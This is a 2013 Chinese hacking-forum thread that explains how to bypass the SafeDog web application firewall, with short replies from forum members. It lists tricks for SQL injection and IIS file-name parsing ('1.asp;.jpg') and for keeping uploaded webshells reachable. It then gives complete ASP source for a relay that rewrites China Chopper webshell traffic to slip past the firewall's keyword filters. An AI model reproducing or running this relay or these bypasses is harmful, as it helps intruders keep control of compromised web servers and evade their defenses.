90_ 发表于 2013-1-5 09:26:21

过安全狗技术总汇

作者:鬼哥

1.过注入
2.过大马被阻拦访问
3.过菜刀连接一句话被拦截
4.过1.asp;.jpg这样的文件
其他我没遇到了。。

现在一点一点讲:
1.过注入
方法一:a.asp?aaa=%00&id=sql语句
方法二:**** Hidden Message *****

2.过大马被阻拦访问
方法一:上传一个大马 然后访问http://sss.com/dama.asp访问后出现拦截。
解决方法:**** Hidden Message *****

3.过菜刀连接一句话被拦截
方法一:不用菜刀连接一句话,用别的一句话连接端。
方法二:**** Hidden Message *****

4.过1.asp;.jpg这样的文件拦截
方法一:;1.asp;.jpg
方法二:保密

具体就为大家总结这么多了,安全狗 反正基本可以无视了!!
大家还有什么要补充的可以发在下面!

下面这个脚本是过安全狗连接菜刀用的 用法: 先把这个脚本放到个可执行.asp的目录
然后访问http://www.xx.com/asf.asp?dz=你要过的那个webshell地址
然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型
例如:http://www.xx.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码
这样输入就菜刀
这个脚本暂时支持.php .aspx的一句话连接.asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持!


<%
        '饶过的原理,抓菜刀连接webshell的包 然后研究安全狗过滤了哪些关键字 中转替换掉那些过滤的关键字 就成!
        JmStr=Replace(Request.Form,"$_POST","$_REQUEST")
        JmStr=Replace(JmStr,"->|","-->|")
        JmStr=Replace(JmStr,"@eval(","@eval   (")
        JmStr=Replace(JmStr,"System.Convert.FromBase64String","System.Convert. FromBase64String")
        JMUrl=request("dz")
        response.writerequest("dz")
        JmRef=JMUrl
        JmCok=""
        response.writePostData(JMUrl,JmStr,JmCok,JmRef)
        Function PostData(PostUrl,PostStr,PostCok,PostRef)
        Dim Http
        Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
        With Http
        .Open "POST",PostUrl,False
        .SetRequestHeader "Content-Length",Len(PostStr)
        .SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
        .SetRequestHeader "Referer",PostRef
        '.SetRequestHeader "Cookie",PostCok
        .Send PostStr
        PostData = .ResponseBody
        End With
        Set Http = Nothing
        PostData =bytes2BSTR(PostData)
        End Function

        Function bytes2BSTR(vIn)
        Dim strReturn
        Dim I, ThisCharCode, NextCharCode
        strReturn = ""
        For I = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, I, 1))
        If ThisCharCode < &H80 Then
        strReturn = strReturn & Chr(ThisCharCode)
        Else
        NextCharCode = AscB(MidB(vIn, I + 1, 1))
        strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
        I = I + 1
        End If
        Next
        bytes2BSTR = strReturn
        End Function

        Function URLEncoding(vstrin)
        strReturn=""
        Dim i
        For i=1 To Len(vstrin)
        ThisChr=Mid(vstrin,i,1)
        if Abs(Asc(ThisChr))< &HFF Then
        strReturn=strReturn & ThisChr
        Else
        InnerCode=Asc(ThisChr)
        If InnerCode<0 Then
        InnerCode=InnerCode + &H10000
        End If
        Hight1=(InnerCode And &HFF00) \&HFF
        Low1=InnerCode And &HFF
        strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
        End if
        Next
        strReturn=Replace(strReturn,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
        strReturn=Replace(strReturn,chr(43),"%2B")'J6156增加转换+字符
        'strReturn=Replace(strReturn,过滤字符,"转换为字符")'在此增加要过滤的代码
        URLEncoding=strReturn
        End Function

        %>

rmn190 发表于 2013-1-5 10:09:43

多谢分享, 学习学习

s0mewhat 发表于 2013-1-5 10:34:51

学习            

CHIN 发表于 2013-1-5 10:56:21

老是过不了{:soso_e109:}

blackfish 发表于 2013-1-5 12:27:24

看看吧

blackfish 发表于 2013-1-5 12:29:36

用过 include 一个文件

xiaolingluan 发表于 2013-1-5 12:35:49

chq2ll 发表于 2013-1-5 13:27:06

楼主辛苦了进来学习下

mg8 发表于 2013-1-5 13:33:12

看一看,学一学!

ocean527 发表于 2013-1-5 13:34:00

学习一下楼主
页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: 过安全狗技术总汇